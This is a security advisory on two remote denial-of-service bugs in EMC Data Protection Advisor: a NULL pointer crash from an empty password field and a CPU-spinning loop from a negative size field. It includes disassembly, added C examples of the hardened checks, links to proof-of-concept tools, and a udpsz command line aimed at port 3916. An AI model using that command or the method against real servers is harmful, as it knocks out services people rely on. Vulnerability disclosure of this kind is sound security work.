#######################################################################
Luigi Auriemma
Application:  EMC Data Protection Advisor
              http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions:     <= 5.8.1
Platforms:    AIX, HP-UX, Linux, Solaris, Windows
Bugs:         A] cProcessAuthenticationData NULL pointer
              B] thread CPU 100%
Exploitation: remote
Date:         29 Mar 2012
Author:       Luigi Auriemma
e-mail:       aluigi@autistici.org
web:          aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC’s powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."
#######################################################################
=======
2) Bugs
=======
------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------
A missing or empty password field in the AUTHENTICATECONNECTION command
(which is required to log in) leads to a NULL pointer dereference in the
DPA_Utilities.cProcessAuthenticationData function: the pointer returned by
decodeString is passed to an inline strlen() loop without a NULL check:
10042EA0 /$ 55             PUSH EBP
10042EA1 |. 8BEC           MOV EBP,ESP
10042EA3 |. 83EC 0C        SUB ESP,0C
10042EA6 |. A1 B04F0C10    MOV EAX,DWORD PTR DS:[100C4FB0]
10042EAB |. 33C5           XOR EAX,EBP
10042EAD |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
10042EB0 |. 53             PUSH EBX
10042EB1 |. 56             PUSH ESI
10042EB2 |. 8BF1           MOV ESI,ECX
10042EB4 |. 57             PUSH EDI
10042EB5 |. 56             PUSH ESI
10042EB6 |. E8 93E3FBFF    CALL DPA_Util.decodeString
10042EBB |. 8BC8           MOV ECX,EAX
10042EBD |. 83C4 08        ADD ESP,8
10042EC0 |. 8D59 01        LEA EBX,DWORD PTR DS:[ECX+1]
10042EC3 |> 8A11           /MOV DL,BYTE PTR DS:[ECX]        ; strlen() NULL pointer
10042EC5 |. 83C1 01        |ADD ECX,1
10042EC8 |. 84D2           |TEST DL,DL
10042ECA |.^75 F7          \JNZ SHORT DPA_Util.10042EC3
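The following C example is added here to illustrate the bug pattern above and the check that closes it; it is not code from the advisory or from the EMC product. decode_string is a hypothetical stand-in for DPA_Util.decodeString (the real decoder's behaviour beyond "returns NULL for a missing or empty password" is not documented on the page), and the status codes and function names are constructed for the example.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Return codes for the hardened handler (constructed for this example). */
enum auth_status { AUTH_OK = 0, AUTH_REJECT_EMPTY = -1, AUTH_REJECT_OOM = -2 };

/* Hypothetical stand-in for DPA_Util.decodeString: returns a heap copy of the
 * field value, or NULL when the field is absent or empty. This mirrors the
 * advisory's observation that a missing/empty password yields a NULL pointer
 * at the call site; it is not the real decoder. */
static char *decode_string(const char *field)
{
    if (field == NULL || field[0] == '\0')
        return NULL;
    size_t n = strlen(field) + 1;
    char *copy = malloc(n);
    if (copy != NULL)
        memcpy(copy, field, n);
    return copy;
}

/* The vulnerable pattern, as in the inline byte loop at 10042EC3: the pointer
 * returned by the decoder is scanned for its terminating NUL byte. With no
 * NULL check in front of it, a missing password dereferences address 0 and
 * the service thread crashes. Precondition here: decoded != NULL. */
static size_t scan_length_unchecked(const char *decoded)
{
    const char *p = decoded;
    while (*p != '\0')
        p++;
    return (size_t)(p - decoded);
}

/* Hardened handler: validate the decoder result before measuring it, and
 * treat an absent or empty password as an authentication failure rather
 * than as input to strlen(). */
int process_authentication_data(const char *password_field, size_t *out_len)
{
    char *decoded = decode_string(password_field);
    if (decoded == NULL) {
        /* Distinguish "no/empty field" from allocation failure so the caller
         * can log the right reason; both must reject the login. */
        return (password_field == NULL || password_field[0] == '\0')
               ? AUTH_REJECT_EMPTY : AUTH_REJECT_OOM;
    }
    *out_len = scan_length_unchecked(decoded);   /* safe: decoded != NULL */
    free(decoded);
    return AUTH_OK;
}

/* Convenience wrapper: password length (>= 0) on success, negative status
 * otherwise. */
long authenticate_length(const char *password_field)
{
    size_t len = 0;
    int rc = process_authentication_data(password_field, &len);
    return rc == AUTH_OK ? (long)len : (long)rc;
}

int main(void)
{
    /* Constructed inputs: absent field, empty field, and a normal password. */
    return (authenticate_length(NULL) == AUTH_REJECT_EMPTY &&
            authenticate_length("") == AUTH_REJECT_EMPTY &&
            authenticate_length("s3cret") == 6) ? 0 : 1;
}
```

The point of the hardened version is that the decoder's failure case is handled at the call site, before any byte of the result is read; the missing-field and empty-field cases then become an ordinary authentication failure instead of a crash of the listening thread.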
------------------
B] thread CPU 100%
------------------
The DPA_Utilities library enters an endless loop while handling the
protocol if a negative 64-bit size field is used, because the size is
checked with signed comparisons:
100138FC  > 3BF1           CMP ESI,ECX
100138FE  . 75 0C          JNZ SHORT DPA_Util.1001390C
10013900  . 8B55 E4        MOV EDX,DWORD PTR SS:[EBP-1C]
10013903  . 0B55 E8        OR EDX,DWORD PTR SS:[EBP-18]
10013906  . 0F84 C1020000  JE DPA_Util.10013BCD
1001390C  > 2975 DC        SUB DWORD PTR SS:[EBP-24],ESI
1001390F  . 68 20870910    PUSH DPA_Util.10098720           ; "nsReadRequest"
...
100137F0  > 8B7D 08        MOV EDI,DWORD PTR SS:[EBP+8]
100137F3  > 8B75 E4        MOV ESI,DWORD PTR SS:[EBP-1C]
100137F6  > 837D E8 00     CMP DWORD PTR SS:[EBP-18],0      ; signed comparison
100137FA  . 7F 4A          JG SHORT DPA_Util.10013846
100137FC  . 7C 04          JL SHORT DPA_Util.10013802
100137FE  . 85F6           TEST ESI,ESI
10013800  . 77 44          JA SHORT DPA_Util.10013846
10013802  > 837D E0 00     CMP DWORD PTR SS:[EBP-20],0      ; signed comparison
10013806  . 0F8C 0B040000  JL DPA_Util.10013C17
1001380C  . 7F 0A          JG SHORT DPA_Util.10013818
1001380E  . 837D DC 00     CMP DWORD PTR SS:[EBP-24],0
10013812  . 0F86 FF030000  JBE DPA_Util.10013C17
10013818  > BF 1B700910    MOV EDI,DPA_Util.1009701B
1001381D  . 33F6           XOR ESI,ESI
1001381F  > 33C9           XOR ECX,ECX
10013821  . 894D F4        MOV DWORD PTR SS:[EBP-C],ECX
10013824  . 894D F0        MOV DWORD PTR SS:[EBP-10],ECX
10013827  . 390B           CMP DWORD PTR DS:[EBX],ECX
10013829  . 894D F8        MOV DWORD PTR SS:[EBP-8],ECX
1001382C  . 894D EC        MOV DWORD PTR SS:[EBP-14],ECX
1001382F  . 0F84 C7000000  JE DPA_Util.100138FC
Note that this loop does not affect the other connections to the affected
service; only the thread handling the malformed request spins.
Both bugs can be exploited in the following services:
- DPA_Controller on port 3916
- DPA_Listener on port 4001
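The following C example is added here to show the size-field handling behind bug B and a bounded alternative; it is not code from the advisory or from the EMC product. The wire format (an 8-byte big-endian size followed by the body), the MAX_REQUEST_BYTES limit, the status codes and all function names are assumptions made for this example; the real DPA request layout is not documented on the page.

```c
#include <stddef.h>
#include <stdint.h>

/* Largest request body the handler is willing to read (assumed limit). */
#define MAX_REQUEST_BYTES ((uint64_t)16 * 1024 * 1024)

enum size_status {
    SIZE_OK = 0,
    SIZE_NEGATIVE = -1,   /* sign bit set: negative if read as int64 */
    SIZE_TOO_LARGE = -2,
    SIZE_TRUNCATED = -3   /* header claims more bytes than were received */
};

/* The original check (JG/JL on the high dword at 100137FA/100137FC) treats
 * the size as a signed 64-bit number, so 18446744073709551615
 * (0xFFFFFFFFFFFFFFFF) compares as -1: not greater than zero, hence "no body
 * to read", while nothing is consumed from the stream either, and the
 * handler re-enters the same state. (The unsigned-to-signed cast below is
 * implementation-defined in C; on two's-complement targets it yields -1.) */
static int signed_check_says_nothing_to_read(uint64_t declared)
{
    return (int64_t)declared <= 0;
}

/* Hardened check: treat the field as unsigned, reject anything with the
 * sign bit set, and cap it at a sane maximum before any loop depends on it. */
int classify_size(uint64_t declared)
{
    if (declared >> 63)
        return SIZE_NEGATIVE;
    if (declared > MAX_REQUEST_BYTES)
        return SIZE_TOO_LARGE;
    return SIZE_OK;
}

/* Big-endian 64-bit read (assumed wire order for this example). */
static uint64_t read_u64_be(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v = (v << 8) | p[i];
    return v;
}

/* Parse one request: 8-byte size field followed by the body. Returns the
 * number of bytes consumed (> 0) or a negative size_status. Every outcome
 * either advances the stream or fails the request, so a caller looping over
 * requests can never spin in place on a hostile size. */
long read_request(const unsigned char *buf, size_t buf_len)
{
    if (buf_len < 8)
        return SIZE_TRUNCATED;
    uint64_t declared = read_u64_be(buf);
    int rc = classify_size(declared);
    if (rc != SIZE_OK)
        return rc;
    if (declared > (uint64_t)(buf_len - 8))
        return SIZE_TRUNCATED;
    return (long)(8 + declared);
}

/* Constructed sample frames. */
static const unsigned char FRAME_GOOD[] = {
    0, 0, 0, 0, 0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o'
};
static const unsigned char FRAME_NEGATIVE[] = {   /* size = 18446744073709551615 */
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 'x'
};

int main(void)
{
    return (read_request(FRAME_GOOD, sizeof FRAME_GOOD) == 13 &&
            read_request(FRAME_NEGATIVE, sizeof FRAME_NEGATIVE) == SIZE_NEGATIVE)
           ? 0 : 1;
}
```

Two properties matter for a protocol reader of this kind: length fields from the network are compared as unsigned values against an explicit upper bound, and each pass through the read state either consumes bytes or terminates the request. The second property is what turns a bad size into a closed connection instead of a thread pinned at 100% CPU.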
#######################################################################
===========
3) The Code
===========
A]
http://aluigi.org/poc/dpa_1.zip
dpa_1 SERVER
B]
http://aluigi.org/testz/udpsz.zip
udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################